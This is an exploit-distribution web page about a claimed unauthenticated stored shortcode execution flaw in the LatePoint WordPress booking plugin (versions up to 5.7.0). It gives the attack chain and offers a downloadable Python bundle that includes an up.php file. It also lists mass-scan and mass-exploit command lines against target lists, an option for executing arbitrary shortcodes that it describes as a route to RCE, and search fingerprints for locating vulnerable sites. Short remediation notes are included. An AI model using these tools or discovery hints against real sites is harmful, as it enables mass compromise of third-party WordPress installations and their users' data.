POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
WordPresscritical

CVE-2026-92966 — WordPress LatePoint ≤5.7.0 Stored Shortcode Execution (Customer Cabinet)

October 1, 2026 · 67 views

LatePoint appointment booking ≤5.7.0: unauthenticated guest booking stores [shortcode] in customer first/last name (sanitize_text_field keeps brackets); Customer Cabinet block renders welcome line then the_content do_shortcode runs twice → arbitrary shortcode execution. CVSS 9.1 Critical (CWE-94). Fixed in 5.7.1. No API key. Python PoC: check, mass exploit, --lab, optional POCBIT_EXEC_SHORTCODE. Marker POCBIT-92966-OK.

#wordpress#latepoint#plugin#shortcode#code-injection#cwe-94#stored#critical#unauthenticated#booking

CVE:

CVE-2026-92966

Date:

2026-10-01

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-92966 — LatePoint WordPress appointment plugin — unauthenticated stored shortcode execution (Wordfence CNA; CVSS 3.1 9.1 Critical, CWE-94).

| | | |---|---| | Product | LatePoint | | Affected | ≤ 5.7.0 | | Fixed | ≥ 5.7.1 | | Verify marker | POCBIT-92966-OK | | Finder | hashiramasenju333 |

Guest booking stores customer first name / last name with sanitize_text_field() — square brackets are not stripped, so payloads like [caption]…[/caption] persist. The Customer Cabinet Gutenberg block renders Welcome with esc_html(full_name) (brackets survive). WordPress do_shortcode on the_content at priority 11 parses stored shortcodes a second time. 5.7.1 encodes delimiters via encode_shortcode_delimiters() on dashboard output.

PoC page: https://pocbit.org/pocs/cve-2026-92966

GitHub: murrez/CVE-2026-92966

CVE.org: CVE-2026-92966

Wordfence: Threat Intel advisory

Attack chain (summary)

  1. Plant — Unauthenticated booking: set customer[first_name] (or last name) to a shortcode payload (default probe: core [caption]POCBIT-92966-OK[/caption]).
  2. Trigger — Load a page with the Customer Cabinet block as that customer (guest session after booking). Second do_shortcode pass executes the stored shortcode.

Site-specific RCE may chain to dangerous plugin shortcodes via POCBIT_EXEC_SHORTCODE or --exec-shortcode.

Bundled tool (Python 3.10+)

Download cve-2026-92966.py — bundle extractor (poc.py, _engine.py, up.php).

pip install requests colorama

python cve-2026-92966.py
python poc.py --lab

python poc.py --check targets.txt
python poc.py targets.txt -t 20 -T 28

python poc.py -u https://target.example --check
python poc.py -u https://target.example

set POCBIT_EXEC_SHORTCODE=[your_shortcode_here]
python poc.py -u https://target.example

| Mode | Output | |------|--------| | check | hits.txt — readme ≤5.7.0, LatePoint fingerprints | | exploit | exploited.txt — marker after plant + Customer Cabinet trigger |

Mass scan statuses include plant_no_auth_cookie, plant_missing_service_id, no_customer_cabinet_page, shortcode_not_triggered, patched_skip.

Discovery hints

body="/wp-content/plugins/latepoint/"
body="latepoint-book-form"
body="latepoint_helper"

Remediation

  1. Upgrade LatePoint to ≥ 5.7.1 immediately.
  2. Restrict public booking if not required; audit customer names for [ / ].
  3. Temporary WAF: block brackets in booking name fields on latepoint_route_call.

See also WordPress plugin vulnerabilities guide.

Legal and ethical use

Authorized security testing only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →